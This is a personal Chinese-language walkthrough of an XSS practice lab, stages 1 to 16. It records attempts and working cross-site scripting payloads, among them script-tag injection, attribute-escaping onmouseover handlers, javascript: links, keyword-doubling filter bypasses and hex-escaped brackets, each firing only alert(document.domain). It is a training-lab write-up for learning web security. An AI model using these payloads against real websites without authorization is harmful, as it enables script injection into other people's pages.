XSS challenges 1-16
看了一遍视频后自己再试一试,挠头
Stage #1
输入1111
显示
查看代码
直接输入
<script>alert(document.domain);</script>
Stage #2
输入1111
查看代码,如图
尝试闭合标签
1111 "><script>alert(document.domain)</script>
成功,并且代码显示为
Stage #3
输入1111
代码显示为
尝试
"><script>alert(document.domain);</script>
显示
考虑在Japan后进行闭合,打开Burpsuite,进行如图修改
p1=1111&p2=Japan >"<script>alert(document.domain)</script>
成功
Stage #4
输入1111
能发现有个hidden,抓包后能看到
则尝试在hackme后面添加”><script>alert(document.domain)</script>
成功
Stage #5
输入1111
查看代码
maxlength只有15,如果输入
"><script>alert(document.domain)</script>不够长
如图
则修改maxlength
再次输入"><script>alert(document.domain)</script>
成功
Stage #6
输入1111,查看代码
尝试闭合,输入"><script>alert(document.domain)</script>
"、<、>都被转换
尝试" onmouseover="alert(document.domain)
成功,代码显示为
Stage #7
输入1111,查看代码
尝试"><script>alert(document.domain)</script>
显示
尝试" onmouseover="alert(document.domain)
显示
观察代码,好像多了两个双引号,尝试onmouseover=alert(document.domain)
显示
挠头,再试试"onmouseover=alert(document.domain)
挠头
看看hint
Hint: nearly the same... but a bit more tricky.再看看代码
试试" onmouseover=alert(document.domain)
行了
Stage #8
输入1111,查看代码
和页面显示的
尝试javascript:alert(document.domain)
点击产生的url
成功
Stage #9
输入1111
眼熟,嗯
先试试"><script>alert(document.domain)</script>
果然不行,再试试"onmouseover=alert(document.domain),还是不行
再试试">,还是被变成了字符串的形式
再看看hint
Hint: UTF-7 XSS,挠头
跳过
在console里输入
进入下一关
Stage #10
先输入1111,看代码
好像比较正常,试试
"><script>alert(document.domain)</script>
我的domain呢??
试试双写
"><script>alert(document.domdomainain)</script>
ok了
Stage #11
输入1111
哟
比较正常,试试"><script>alert(document.domain)</script>
被转换了
再试试"onmouseover=alert(document.domain)
onmouseover被过滤了
再试试"><a href="javascript:alert(documment.domain)">xss</a>
挠头,被转换了
试试 将JavaScript分开
点击xss
成功
Stage #12
输入1111,查看代码
挺正常的,试试"><script>alert(document.domain)</script>
>,<都被消去了,看看hint试试将<,>转换成16进制
"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e
挠头,试试
"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
挠头,百度启动,要在IE浏览器中用``,
跳过
Stage #13
好像这个的操作别的浏览器不支持了,只有IE支持
跳过
Stage #14
挠头,跳过
Stage #15
输入1111,看代码
挠头,挺正常,试试"><script>alert(document.domain)</script>
挠头,试试转换<,>
"\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e
再试试"\\x3e\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
ok
Stage #16
直接unicode转换